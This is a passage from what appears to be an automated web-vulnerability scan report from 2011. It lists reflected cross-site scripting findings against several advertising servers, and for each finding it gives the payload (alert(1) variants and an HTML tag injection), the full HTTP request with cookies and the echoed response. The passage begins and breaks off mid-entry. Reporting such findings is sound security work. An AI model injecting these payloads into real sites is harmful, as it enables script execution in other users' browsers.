fc=P8r1GRRUBPzt1rj093eSUyd0kIOGQ-01IqHp4E6nJR0sgJfvPMxam1XE0VXjRZkHDvAB7dj0g9rEc92kPRVoFw0-m0BkBmdsMbfLJKocp81E28M44OKTmpkvbjqqib7MAp1BJ3k6cxFoa6z2wZnSQRA23o3kcOf_vksOCkd4aIk; pf=UGHb8zI4aWtxtAmZyNeJNOHVFbSxqG9hsprN4v3Lz7LQ4qp2i9jCVLo21ITPxTJXB9En7PzxQcEcevWyHskThbQXXj1jA2FyUlkwwkhF7Ro2ZM7BNfD3Nrq6VH58nArltBKmEiDSJc28wBcf6WsZnUwqlFt-IvrL3Cyer2N_b_mQBT67XG3r_GqqLNCDP6TWM6QtivX9DfUZcKCbSzspOG4m4SNemiZsDiwHpMom7zAuHGj61Fo18HFz7Miw6CJ_lAToSBCIK8xd4Nhi3WZ5RVrFAd6zRhrKdfWaTudRRtzdw3uPJsigd4Z03fwI832qp0yYZ8xsq2g2JzvVLF3m0wYmvQ-7zazlMMeR5t48rmodxWJcKS5DgWnPQyOG3H9dle4JdVl67EbeBoMsCr3yKTNk5q5Z7Ye-yqAjt8FV6TEs0w1Mf61wa5sbZduLkMcmu6BxGVr1a1EtZ6VakW9qP0UsyZ23YtDx8Hp9aqDHgS7TLwotn8ChX3Ao59tcjALmIsfXlHObMd1dM-9EmR9zq1feDyJ1JsMdvufmKTEv8zYWEcVWdTIfg0R3HCs5Zgu8aqqZRUbE5cNgHLG-cyhwp9zF6bIQmuyiOkEVXhOR34lY8hTahfCesI1SII1o7GCSTkQctMdsR8ol26b8wwOWRulLcAuUbWv5XradSS5Og7yWq1NAPlM-71DUoari4r4P1Y5A3tzwkjyyX8-0gYHGU5jnzszrbJmm4ATS7VE3nQTOLZuOv6rXl3lXT98xe_hpQk1J2tMJ7uf0wgawDl5tZsTT5kN5mzq7cQ_zim8SvdxF5k8za64BvapgLtKI75QWoFdHsE8JeyafKsb518Z8yG2rlDCHXdIcSLBgYtlkloVO9_IUqGf6VJi47Jt9VzE1iUilagnqDfZezBDAgKeQJqma1IxzDiCoqn5pMBzKyly1EGZOdFA2-qArtbtQRT50YdNPvJqt7eLAf5C0e2pQiKZbm53MKuxT-xACBztAh4jFDcYPKkwR30hpsQ3QHTsbR1jwb4Tknj1lRvA_43zRPga4UleoT5uXiADlzwkOVA067MXkh4FAeKVzg1ACtjgSr5Gp6DR1BdDSotYHbfNzBgKBFuNAXObQP9_MMOI3eG1WGdO281P8amOaY7gqA06Qz3ZYqAavLj_IiDm0PZqfexb3wevMxi_3MpY_DV3nsHFBx31PTcSHvXJd2U5JBFuC4zIXCy6m3DgsRU-dDxSk0aAqkW75gcATwU4afh3aZM0faU7ttedZBHKMSUKU2-CLArzpv1sCFqKO2OO_7QHd61ElSVhkX8nCFJ8XYbO8pgqPz6rxA2zJp0kRUBjlvUbWcclJ3ktilOIca42ILmxDGq12QBEWUhzuVA36zOFcdBowxbu4TWEkjnoG3y3BQoeZ0WJ4-WctW3Z_ONfcXbWfjQNvc84m9Ucmpn2n7616Wmjkp_YRqKp502Bw_HclXEDNxATqSEvwR6YWNJOibQmjAIOFfhKbFkHTBHoHJsdi8MjHFkcfi4c9KAVErlkS3F2SFWLNhm5B3_eb2Qy3toXmjExHhirQMRh4tcgyEqZ-0Ko; rrs=undefined%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7Cundefined%7C1004%7C1005%7C12; rds=undefined%7C15038%7C15038%7C15050%7Cundefined%7C15038%7C15038%7C15038%7C15038%7C15038%7C15044%7C15044%7Cundefined%7C15044%7C15050%7C15044; rv=1; uid=8392341830659049202

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8392341830659049202; Domain=.turn.com; Expires=Fri, 16-Sep-2011 12:36:48 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 20 Mar 2011 12:36:47 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=8392341830659049202&rnd=2330112951656104509&fpid=bf8e7"><script>alert(1)</script>c2a54bafa56&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.51. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6ec6"-alert(1)-"1abcef75134 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=1602587&e6ec6"-alert(1)-"1abcef75134=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://therugged.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pv1="b!!!!0!!L7_!*:n8!$0c3!,+ZH!#WUL!!!!$!?5%!(KYu6!wDW,!%JFh!%Oo9!$8eI~~~~~<o,,><s?nHM.jTN!#819~!$gwk!0E=#!%G'u!!!!$!?5%!$Tey-!ZZ<)!!jYm!'Mrt~~~~~~<p%L'~M.jTN!#tBx!+*gd!$6O/!0H/O!%G[Z!!H<'!!?5%'2^c6!wVd.!%QRf!!ayK!'N^l~~~~~<pN(@~~!#R%`!$5*F!$CM.!104d!$i70!!!!$!?5%!$T[s,!?vQ,!%c4C~~~~~~~<qn]E<rmC_!!!([!!qy:!$5*F!$6>P!1%3H!$Zu6!!!!$!?5%!$qXJ3!?vQ,!%Q#<~~~~~~~<qc=7<rb!Q!!!([!#LXe!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~~!#LXr!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~M.jTN!#LY.!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~M.jTN!#Lb-!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~!!xa=!#P,C!-8F-!$V-H!0.2@!$u#J!!!!$!?5%!%QX7/!@Dj0!'%it~~~~~~~<pqfN<qpLh!!!([!!LV3!-8F-!$V-H!,Dln!$tyI!!H<)!?5%!%QX7/!@Dj0!'%it~~~~~~~<pqk'<qpQA!!!([!#`ac!$5*F!$i@e!0oZP!%GRx!!H<)!?5%!$qXJ3!@Dj0!'NRE~~~~~~~<qc=9<sGhr!!!([!!Rl,!!E)$!$XwU!0pbc!$so$!#a.3!!,)#%5tS5!]7:6!%4=%!%g*F~~~~~~<qd6K<smWP!!!(["; uid=uid=87d2451c-50fd-11e0-8afd-003048d6d22e&_hmacv=1&_salt=327327191&_keyid=k1&_hmac=87cfa58169cdc261fd30bf9c1633447993c7cde2; ih="b!!!!N!%?RR!!!!#<pqk,!%?Rl!!!!#<rap9!%?m7!!!!#<p]i+!'cGC!!!!#<nQH-!'cKt!!!!$<nQH1!(4uP!!!!#<p^*H!)AU7!!!!#<pN(R!*rnf!!!!#<pv/a!,+ZH!!!!#<o,,>!,?Kj!!!!$<pN)1!,@lO!!!!#<nQHP!,@rl!!!!%<nQHf!,@s)!!!!#<nQHQ!,A*-!!!!$<pj[S!,Dln!!!!#<pqk'!->hZ!!!!#<pv0=!-fc'!!!!#<pd]p!.$Cj!!!!#<qc=8!.$Cr!!!!#<qc=7!.L'V!!!!#<rasm!.SpC!!!!#<rat%!.`'5!!!!$<qd6G!.`.T!!!!#<rAKN!.`.U!!!!#<o'YF!0(6l!!!!#<p]b^!0.2@!!!!#<pqfN!0E=#!!!!#<p%L'!0H/O!!!!$<pN(@!0QKi!!!!#<p]Te!0QKk!!!!$<pk#S!0QLr!!!!#<pN(S!0S3y!!!!#<qd4F!0cn'!!!!#<q*ty!0cn,!!!!#<p]aI!0con!!!!%<pv08!0coo!!!!#<p]rg!0eUu!!!!#<qn]D!0oZP!!!!#<qc=9!0pbc!!!!$<qd6K!0vr,!!!!$<raoq!1%3H!!!!#<qc=7!104d!!!!#<qn]E"; bh="b!!!%1!!!?I!!!!/<qd67!!%#4!!7(q<o_%.!!)Qf!!!!(<nTlX!!*cu!!!!3<qd68!!*oY!!!!%<pN)4!!+Vp!!!!#<pqhD!!-?2!!!!*<pN)4!!-L3!!!!#<pqhD!!-LP!!!!#<pqhD!!-Oo!!!!#<nsgt!!/DA!!!!3<qd67!!/Hd!!!!2<qd67!!/He!!!!2<qd68!!/j$!!!!%<nTlW!!/pv!!!!#<pqhD!!04Z!!!!#<qgdp!!0O0!!!!#<pqhD!!1CD!!!!#<p]be!!1Mv!!!!)<qPUB!!1N=!!!!'<qPUB!!1NO!!!!$<qPUB!!1SP!!!!#<nsm5!!2-O!!!!(<nTlW!!2P@!!!!#<nAv8!!3):!!!!5<qd67!!3)?!!!!5<qd67!!3)C!!!!5<qd68!!4@a!!!!#<q)L?!!4i7!!!!#<qbhM!!4oZ!!!!#<nA,w!!?VS!!<NC<qDX7!!M=.!!!!)<pjWE!!Mev!!!!#<oa?r!!MfS!!!!'<oaA%!!N8v!!!!#<pqhD!!N]q!!!!$<qc5_!!PKh!!!!#<okyj!!PL)!!!!%<okyj!!PL`!!!!'<okyj!!R`u!!!!(<qd68!!Ra#!!!!(<qd68!!Ra)!!!!(<qd68!!UHs!!!!(<pLo`!!Vj^!!!!%<pLoI!!X*c!!!!#<pBKB!!X41!!!!%<pLo[!!Zwb!!!!/<pN)4!![@p!!!!$<qd4F!!bu:!!!!)<pjWE!!g]F!!!!#<pqhD!!itb!!!!6<qd67!!j,.!!<NC<qDX7!!jW8!!!!)<pjWE!!nAU!!!!#<pqhD!!pkJ!!!!6<qd67!!pkL!!!!6<qd68!!qrq!!!!6<qd67!!qrr!!!!6<qd67!!qrv!!!!6<qd68!!qyo!!!!2<qd68!!st`!!!!(<nA,e!!u2f!!!!#<nA,G!!uhi!!!!#<pqhD!!waQ!!!!#<pqhD!!xV'!!!!#<qBrC!!xV=!!!!#<qBs(!!xw:!!!!#<pqhD!!yXN!!!!#<nAwa!!yaE!!!!)<pjWE!!yq>!!!!#<re$l!!yq?!!!!#<pOO/!###L!!!!#<qNtp!##ah!!!!#<pqhD!#(x0!!!!(<pLo[!#*Xa!!!!#<rao$!#*Xb!!!!#<r)hx!#*Xc!!!!#<r)hx!#+x/!!!!#<nQdW!#.dO!!!!)<pjWE!#0fP!!!!$<qd68!#0fR!!!!$<qd67!#0fW!!!!$<qd68!#0mN!!!!#<nAwa!#16I!!<NC<qDX7!#17A!!7(q<o_%.!#2._!!!!$<qPUB!#2.i!!!!#<okyj!#2Ic!!!!(<oaA$!#2Id!!!!%<oaA!!#3[#!!!!$<nQHk!#3pS!!!!#<p,e4!#3pv!!!!#<p,e4!#4ue!!!!#<p3Y1!#5(U!!!!#<pjT1!#5(W!!!!#<piFJ!#5(Y!!!!#<pjTA!#5(^!!!!#<pjT1!#5(a!!!!#<piFJ!#6Ty!!!!#<oDg4!#89b!!!!#<pqh_!#HhJ!!!!#<qX-f!#I=D!!!!$<pd+P!#K?^!!!!'<p_19!#Km+!!!!#<qppS!#L*a!!!!6<qd67!#LI/!!!!#<p]be!#MTC!!!!6<qd68!#MTF!!!!*<q*ty!#MTH!!!!6<qd67!#MTI!!!!6<qd67!#MTJ!!!!6<qd68!#M]c!!!!)<pjWE!#Ms!!!!!#<rao$!#N+W!!!!#<qPUB!#O60!!!!#<nAwa!#O@L!!<NC<qDX7!#O@M!!<NC<qDX7!#OWV!!!!$<ol!U!#OWX!!!!#<ol!J!#O^a!!!!#<nAv8!#P8A!!!!#<nAv8!#Q*T!!!!)<pjWE!#Q+p!!!!)<pjWE!#Q,.!!!!#<pjWF!#QpI!!!!3<qd67!#QpJ!!!!3<qd67!#QpL!!!!3<qd67!#QpS!!!!3<qd67!#QpU!!!!3<qd67!#RU?!!!!6<qd67!#RUA!!!!6<qd67!#Ri/!!!!)<pjWE!#Rij!!!!)<pjWE!#SCj!!!!%<pjWC!#Sq>!!!!#<nrb9!#T-b!!!!6<qd67!#TnE!!!!6<qd67!#Twl!!!!#<nZs,!#Tws!!!!#<nZjk!#U@t!!!!1<qd67!#U@x!!!!1<qd67!#UA$!!!!1<qd68!#UDQ!!!!*<q*ty!#V,1!!!!#<pqhD!#VDX!!!!#<q4hD!#VRb!!!!#<nAv7!#XI9!!!!#<q)LA!#YOT!!!!$<qOId!#YQK!!!!#<oDg)!#YQL!!!!#<pjT*!#[Qv!!!!#<pqhD!#]#G!!!!#<pqev!#]Ub!!!!4<qd68!#]Uc!!!!4<qd68!#]Ud!!!!4<qd67!#]Ue!!!!4<qd67!#]Uf!!!!4<qd67!#]Ug!!!!4<qd68!#]Uh!!!!4<qd68!#]Ui!!!!4<qd67!#]Uj!!!!4<qd68!#]Uk!!!!4<qd67!#]Ul!!!!4<qd67!#]Um!!!!4<qd67!#]Un!!!!4<qd67!#]Uo!!!!4<qd67!#]Up!!!!4<qd68!#]Us!!!!4<qd68!#]Uy!!!!4<qd68!#]Z!!!!!.<pN)4!#]Z$!!!!*<pN)4!#]w8!!!!'<q*ty!#]w<!!!!'<q*ty!#]wX!!!!%<pv/h!#]w[!!!!'<q*ty!#]wf!!!!'<q*ty!#]wp!!!!'<q*ty!#^c@!!!!*<q*ty!#^cm!!!!*<q*ty!#^f#!!!!2<qd67!#a3k!!!!)<pjWE!#a=#!!!!#<o`%d!#aG>!!!!)<pjWE!#aH+!!!!#<r)hx!#aK:!!!!#<p%Ky!#b<Z!!!!#<piFJ!#b<_!!!!#<pjTD!#b<`!!!!#<pjT1!#b<a!!!!#<pjT1!#b<j!!!!#<pjT1!#b<k!!!!#<piFJ!#b<m!!!!#<nrVk!#b='!!!!#<pjT1!#b=(!!!!#<piFJ!#b=*!!!!#<piFJ!#b=E!!!!#<piFJ!#b=F!!!!#<pjT1!#b=J!!!!#<nrVk!#be'!!!!#<nAv>!#e(n!!!!#<qNNv!#eQ0!!!!#<qbhM!#eQ3!!!!#<qbhM!#e_K!!!!%<q*ty!#ev4!!!!#<rgM%!#f__!!!!#<pd^@!#g)H!!!!*<q*ty!#g)I!!!!*<q*ty!#g)L!!!!$<p%L'!#g)M!!!!#<o,,D!#g)N!!!!$<pN'h!#g)O!!!!*<q*ty!#g)P!!!!*<q*ty!#g)Q!!!!*<q*ty!#g)R!!!!*<q*ty!#g)S!!!!*<q*ty!#g)T!!!!*<q*ty!#g)U!!!!*<q*ty!#g)V!!!!*<q*ty!#g)W!!!!*<q*ty!#g)X!!!!*<q*ty!#g)Y!!!!*<q*ty!#g)Z!!!!*<q*ty!#g)[!!!!*<q*ty!#g)]!!!!*<q*ty!#g)^!!!!*<q*ty!#g]5!!!!'<qUl5!#g_f!!!!#<o,,D!#gaO!!!!$<p%L'!#gaP!!!!*<q*ty!#gb5!!!!4<qd67!#h.N!!!!#<oDg4!#j9h!!!!#<n9!g!#l#]!!!!#<pd+P!#nEj!!!!4<qd67!#n`.!!!!#<qX-f!#p]R!!!!#<p2A7!#p]T!!!!#<p2A7!#q+A!!!!4<qd67!#qF%!!!!*<q*ty!#qF'!!!!*<q*ty!#qUW!!!!4<qd67!#r:6!!!!#<p]dk!#r=i!!!!#<nZs2!#rVT!!!!4<qd67!#sXy!!!!%<qNu<!#so_!!!!#<p]be!#t:@!!!!'<qPUB!#tM)!!!!)<q*ty!#thg!!!!#<pjT1!#uJH!!!!#<pd^1!#uJJ!!!!#<pd^1!#usu!!!!)<pjWE!#v9_!!!!#<nB!e!#w!@!!!!4<qd67!#w!A!!!!4<qd67!#w!B!!!!4<qd67!#w!C!!!!4<qd67!#w!D!!!!4<qd67!#w!F!!!!4<qd68!#w!G!!!!4<qd67!#w!I!!!!4<qd67!#wW9!!!!)<pjWE!#wkr!!!!#<p2A7!#wnK!!!!)<pjWE!#wnM!!!!)<pjWE!#x>u!!!!#<r:uS!#xI*!!!!)<pjWE!#xUM!!!!.<qd67!$#2]!!!!#<r:uS"; BX=6l13v316lnh2l&b=4&s=8i&t=47

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:00:57 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 20 Mar 2011 13:00:57 GMT
Pragma: no-cache
Content-Length: 4648
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.yieldmanager.com/imp?Z=300x250&e6ec6"-alert(1)-"1abcef75134=1&s=1602587&_salt=2109522219";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

1.52. http://ads.pointroll.com/PortalServe/ [r parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf0ba"-alert(1)-"d5d9dfec1b0 was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /PortalServe/?pid=1203631H30720110201170639&flash=10&time=0|9:5|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/3/0/%2a/p%3B235836628%3B0-0%3B3%3B52877536%3B4307-300/250%3B40571478/40589265/1%3Bu%3Dpos-atf|cat-2|%21category-hs_the_nightlife|show-hs_the_nightlife|demo-D|tag-adj|mtype-standard|sz-300x250|tile-3%3B%7Eaopt%3D2/0/d7/0%3B%7Esscs%3D%3f$CTURL$&r=0.1189111452549696bf0ba"-alert(1)-"d5d9dfec1b0 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.teennick.com/shows/the-nightlife
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=D00A51F3-34D8-48E5-A65B-AEA8240476C5; PRbu=EnLjDMH8P; PRsl=11022007583617319321424330414S; S5HitachiSeq=1*1330995589; PRvt=CIJVpEnbEvypYtAK4BBeJDmEnbE3X1F4ACjBAeJcgEnehzmXD9AAVBCeIyeEndpCn0aKAPQBAeIrUEndpEM2mD!G5BAeJHsEnfjOwXZa!cxBCeIJfEnjeJXBN5!RfBCeJhKEnpgtxXiZABzBAe; PRgo=BBBAAsJvCBC_!B!BCVBF4FR; PRimp=989E0400-C52D-9978-0309-84A000730100; PRca=|AKIo*5:1|AJsP*1892:1|AKIk*492:1|AJx5*48:1|AJrW*9395:1|AJor*856:1|AIgT*1774:4|AJi6*1774:2|AJPO*396:1|AJWc*130:1|AJla*1499:2|AJ2e*1153:2|AKEA*263:3|AJeS*12722:1|AJwv*1153:3|AKEU*852:1|AJtd*1329:3|#; PRcp=|AKIoAAAF:1|AJsPAA46:1|AKIkAAHw:1|AJx5AAAm:1|AJrWAC17:1|AJorAANo:1|AIgTAA2c:4|AJi6AA2c:2|AJPOAAGY:1|AJWcAACG:1|AJ2eAC0U:1|AJlaAAYL:2|AJ2eAASb:1|AKEAAAEP:3|AJeSADTM:1|AJwvAASb:3|AKEUAANk:1|AJtdAAV1:3|#; PRpl=|FKgU:1|FBju:1|FIiy:1|ExE4:1|FHwz:1|Etmg:1|EBro:4|EwWo:2|FFCp:1|FFCm:1|E1AQ:1|Eib5:1|Ef30:1|Erny:1|Ernx:1|Ef3M:1|FFCn:1|FFI2:1|FDTA:3|FEo9:1|Es48:1|Es49:1|Es4a:1|#; PRcr=|GHNR:1|GBuk:1|GGJs:1|GAV8:1|GFdm:1|FyK3:1|F8uJ:4|FudI:1|Fvl7:1|GEH2:1|GEHe:1|FiUb:1|FwsR:1|Fq6d:1|Fx3k:1|FyJY:1|FujS:1|GEH7:1|Ft0s:1|GCq8:3|GDle:1|Fxpv:2|Fxpu:1|#; PRpc=|FKgUGHNR:1|FBjuGBuk:1|FIiyGGJs:1|ExE4GAV8:1|FHwzGFdm:1|EtmgFyK3:1|EBroF8uJ:4|EwWoFudI:1|EwWoFvl7:1|FFCpGEH2:1|FFCmGEHe:1|E1AQFiUb:1|Eib5FwsR:1|Ef30Fq6d:1|ErnyFx3k:1|ErnxFyJY:1|Ef3MFujS:1|FFCnGEH7:1|FFI2Ft0s:1|FDTAGCq8:3|FEo9GDle:1|Es48Fxpv:1|Es49Fxpv:1|Es4aFxpu:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 20 Mar 2011 14:05:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1203631' src='http://ads.pointroll.com/PortalServe/?pid=1203631H30720110201170639&cid=1446008&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3ad0/3/0/*/p%3B2358366
...[SNIP]...
1478/40589265/1%3Bu=pos-atf|cat-2|!category-hs_the_nightlife|show-hs_the_nightlife|demo-D|tag-adj|mtype-standard|sz-300x250|tile-3%3B~aopt=2/0/d7/0%3B~sscs=%3F$CTURL$&time=0|9:5|-5&r=0.1189111452549696bf0ba"-alert(1)-"d5d9dfec1b0&flash=10&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

1.53. http://ads.pointroll.com/PortalServe/ [time parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 340d8"%3balert(1)//a095fdf538d was submitted in the time parameter. This input was echoed as 340d8";alert(1)//a095fdf538d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /PortalServe/?pid=1203631H30720110201170639&flash=10&time=0|9:5|-5340d8"%3balert(1)//a095fdf538d&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/3/0/%2a/p%3B235836628%3B0-0%3B3%3B52877536%3B4307-300/250%3B40571478/40589265/1%3Bu%3Dpos-atf|cat-2|%21category-hs_the_nightlife|show-hs_the_nightlife|demo-D|tag-adj|mtype-standard|sz-300x250|tile-3%3B%7Eaopt%3D2/0/d7/0%3B%7Esscs%3D%3f$CTURL$&r=0.1189111452549696 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.teennick.com/shows/the-nightlife
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=D00A51F3-34D8-48E5-A65B-AEA8240476C5; PRbu=EnLjDMH8P; PRsl=11022007583617319321424330414S; S5HitachiSeq=1*1330995589; PRvt=CIJVpEnbEvypYtAK4BBeJDmEnbE3X1F4ACjBAeJcgEnehzmXD9AAVBCeIyeEndpCn0aKAPQBAeIrUEndpEM2mD!G5BAeJHsEnfjOwXZa!cxBCeIJfEnjeJXBN5!RfBCeJhKEnpgtxXiZABzBAe; PRgo=BBBAAsJvCBC_!B!BCVBF4FR; PRimp=989E0400-C52D-9978-0309-84A000730100; PRca=|AKIo*5:1|AJsP*1892:1|AKIk*492:1|AJx5*48:1|AJrW*9395:1|AJor*856:1|AIgT*1774:4|AJi6*1774:2|AJPO*396:1|AJWc*130:1|AJla*1499:2|AJ2e*1153:2|AKEA*263:3|AJeS*12722:1|AJwv*1153:3|AKEU*852:1|AJtd*1329:3|#; PRcp=|AKIoAAAF:1|AJsPAA46:1|AKIkAAHw:1|AJx5AAAm:1|AJrWAC17:1|AJorAANo:1|AIgTAA2c:4|AJi6AA2c:2|AJPOAAGY:1|AJWcAACG:1|AJ2eAC0U:1|AJlaAAYL:2|AJ2eAASb:1|AKEAAAEP:3|AJeSADTM:1|AJwvAASb:3|AKEUAANk:1|AJtdAAV1:3|#; PRpl=|FKgU:1|FBju:1|FIiy:1|ExE4:1|FHwz:1|Etmg:1|EBro:4|EwWo:2|FFCp:1|FFCm:1|E1AQ:1|Eib5:1|Ef30:1|Erny:1|Ernx:1|Ef3M:1|FFCn:1|FFI2:1|FDTA:3|FEo9:1|Es48:1|Es49:1|Es4a:1|#; PRcr=|GHNR:1|GBuk:1|GGJs:1|GAV8:1|GFdm:1|FyK3:1|F8uJ:4|FudI:1|Fvl7:1|GEH2:1|GEHe:1|FiUb:1|FwsR:1|Fq6d:1|Fx3k:1|FyJY:1|FujS:1|GEH7:1|Ft0s:1|GCq8:3|GDle:1|Fxpv:2|Fxpu:1|#; PRpc=|FKgUGHNR:1|FBjuGBuk:1|FIiyGGJs:1|ExE4GAV8:1|FHwzGFdm:1|EtmgFyK3:1|EBroF8uJ:4|EwWoFudI:1|EwWoFvl7:1|FFCpGEH2:1|FFCmGEHe:1|E1AQFiUb:1|Eib5FwsR:1|Ef30Fq6d:1|ErnyFx3k:1|ErnxFyJY:1|Ef3MFujS:1|FFCnGEH7:1|FFI2Ft0s:1|FDTAGCq8:3|FEo9GDle:1|Es48Fxpv:1|Es49Fxpv:1|Es4aFxpu:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 20 Mar 2011 14:05:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1203631' src='http://ads.pointroll.com/PortalServe/?pid=1203631H30720110201170639&cid=1446008&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3ad0/3/0/*/p%3B2358366
...[SNIP]...
3B4307-300/250%3B40571478/40589265/1%3Bu=pos-atf|cat-2|!category-hs_the_nightlife|show-hs_the_nightlife|demo-D|tag-adj|mtype-standard|sz-300x250|tile-3%3B~aopt=2/0/d7/0%3B~sscs=%3F$CTURL$&time=0|9:5|-5340d8";alert(1)//a095fdf538d&r=0.1189111452549696&flash=10&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

1.54. http://ak.quantcast.com/css/ie6.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/css/ie6.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af48c"><a>3c122bd28c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cssaf48c"><a>3c122bd28c9/ie6.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1300542320.1300624433.14; __utmc=14861494; __utmb=14861494.5.8.1300624434708; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Sun, 20 Mar 2011 14:02:58 GMT
Content-Length: 7317
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" cssaf48c"><a>3c122bd28c9 ie6.css" />
...[SNIP]...

1.55. http://ak.quantcast.com/css/ie6.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/css/ie6.css

Issue detail

